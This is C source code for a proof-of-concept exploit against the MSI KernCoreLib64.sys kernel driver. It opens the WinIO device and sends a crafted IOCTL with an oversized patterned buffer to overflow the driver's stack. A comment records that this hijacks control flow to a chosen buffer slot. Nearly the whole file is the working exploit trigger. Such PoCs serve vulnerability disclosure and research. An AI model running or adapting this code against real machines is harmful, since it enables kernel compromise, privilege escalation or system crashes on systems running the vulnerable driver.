MSI KernCoreLib64.sys PoC
#include <Windows.h> | |
#include <stdio.h> | |
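// Report a failed Win32 call: the name of the call plus the thread's last-error code.
// Wrapped in do { } while (0) so it is a single statement even after an unbraced `if`;
// GetLastError() returns a DWORD (unsigned long on Windows), so %lu is the matching
// specifier -- the original %d mismatched the argument type.
#define GLE( x ) do { printf("%s failed with error: %lu\n", x, GetLastError()); } while (0)
// I/O control code sent to the device below. Decoded per the CTL_CODE layout it is
// device type 0x8010, function 0x810, METHOD_BUFFERED, FILE_ANY_ACCESS -- the last
// meaning the I/O manager enforces no particular access right on the handle, which
// matters when assessing who can reach this code path.
#define IOCTL_TRIGGER_OVERFLOW 0x80102040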
// Replicate one byte value into every byte of a 64-bit word,
// e.g. 0x41 -> 0x4141414141414141. Used to fill the IOCTL input
// buffer with a recognisable per-word pattern.
DWORD64 genPattern(BYTE b) {
    DWORD64 word = 0;
    for (int shift = 0; shift < 64; shift += 8) {
        word |= (DWORD64)b << shift;
    }
    return word;
}
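// Entry point of the PoC: opens the WinIO device node and issues a single
// IOCTL_TRIGGER_OVERFLOW request whose input buffer is 20 x 8-byte words
// filled with the patterns for 'A'..'T'. The author's inline note below
// records that, against a vulnerable driver, the call does not return
// normally; the diagnostics after DeviceIoControl are therefore only
// meaningful on a system where the driver handles the request safely.
// Returns 0 on success and -1 if the device cannot be opened or the
// request is rejected (the Win32 error is printed in both cases).
int main() {
    DWORD dwBytesReturned = 0;
    DWORD64 dummy = 0;                 // output buffer; its contents are not inspected
    DWORD64 overflow[20];
    // Derive sizes from the array instead of repeating the literal 20.
    const size_t nWords = sizeof(overflow) / sizeof(overflow[0]);
    const DWORD cbOverflow = (DWORD)sizeof(overflow);

    for (size_t i = 0; i < nWords; i++) {
        overflow[i] = genPattern((BYTE)('A' + i));
        // control flow hijacked with return to overflow[5]
    }

    const char* strDevName = R"(\\.\WinIO)";
    puts("Opening device");
    HANDLE hDevice = CreateFileA(strDevName, GENERIC_READ | GENERIC_WRITE,
                                 FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                                 OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    // CreateFileA signals failure with INVALID_HANDLE_VALUE; the NULL
    // comparison is kept from the original as a harmless extra guard.
    if (hDevice == (HANDLE)0 || hDevice == INVALID_HANDLE_VALUE) {
        GLE("CreateFileA");
        return -1;
    }

    // DeviceIoControl returns a BOOL, not an NTSTATUS: zero means the request
    // failed and GetLastError() holds the reason. The original stored the
    // result in an NTSTATUS and never checked it, so a rejected request
    // (access denied, unsupported code, ...) was indistinguishable from success.
    BOOL ok = DeviceIoControl(hDevice,
                              IOCTL_TRIGGER_OVERFLOW,
                              &overflow[0],
                              cbOverflow,
                              &dummy,
                              sizeof(dummy),
                              &dwBytesReturned,
                              NULL);
    int rc = 0;
    if (!ok) {
        GLE("DeviceIoControl");
        rc = -1;
    } else {
        // DWORD is unsigned long on Windows, hence %lu.
        printf("DeviceIoControl returned, %lu bytes written back\n", dwBytesReturned);
    }

    // Release the device handle explicitly rather than relying on process exit.
    CloseHandle(hDevice);
    return rc;
}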